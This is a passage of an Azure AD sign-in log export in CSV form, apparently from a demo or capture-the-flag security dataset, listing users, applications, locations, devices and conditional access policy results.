'2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ed279ba5-6389-4198-91ad-627e0f191c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ed279ba5-6389-4198-91ad-627e0f191c00,SigninLogs,Sucess,33.7984581,-84.38828278
+510,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:08.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,93fb8ef5-0ca8-4d61-bb5c-4d29418af3cb,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 07:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e446f264-3933-463f-bc0b-d4229cd60e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e446f264-3933-463f-bc0b-d4229cd60e00,SigninLogs,Sucess,36.6404686,-78.26995087
+511,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,20e5a7f1-ff54-47c6-b1af-e0118a1a7a7a,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ca20f843-0c09-4066-88a0-3d474dc61c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,ca20f843-0c09-4066-88a0-3d474dc61c00,SigninLogs,Sucess,50.6406517,5.572050095
+512,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:05.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,782f64ee-9c39-4846-81da-fc7108ca0776,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",880871e0-6cdc-4638-a95e-74bc0b422900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,880871e0-6cdc-4638-a95e-74bc0b422900,SigninLogs,Failed,47.68061829,-122.1869888
+513,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:19.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e148ea43-106b-4bed-a542-c067b42f3978,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0db84f87-d59a-4024-94d6-18fb6e481c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,0db84f87-d59a-4024-94d6-18fb6e481c00,SigninLogs,Sucess,50.6406517,5.572050095
+514,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:15.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:15,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",6a159747-74cb-4439-a8e0-03aeb1090200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6a159747-74cb-4439-a8e0-03aeb1090200,SigninLogs,Sucess,40.75891113,-73.97901917
+515,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:06.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9ccc12eb-5138-4225-bde2-0dd8f0176df5,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Reporting Web Services,[],notApplied,09/04/2020 17:55,{'deviceId': ''},818ddda4-c0b9-4b32-b709-e11793771c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,818ddda4-c0b9-4b32-b709-e11793771c00,SigninLogs,Sucess,38.73078156,-78.17196655
+516,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:40.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85e19a3d-1957-402d-b065-5ac169e5ca6d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:26,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",1fad1a23-2a26-433c-9fe1-043500ec0000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,1fad1a23-2a26-433c-9fe1-043500ec0000,SigninLogs,Sucess,32.32146072,34.85319901
+517,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:52.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ba83dff1-e019-4605-9f27-badb36639883,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Dynamics 365 Portal,bab47555-038a-4434-a931-96cc6091cdd7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",d71ebc6a-e566-4ff2-8faa-6cd726bd2500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],{'errorCode': 0},CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d71ebc6a-e566-4ff2-8faa-6cd726bd2500,SigninLogs,Sucess,47.68061829,-122.1869888
+518,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eb385664-f512-454d-991a-9d4fe8accebe,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 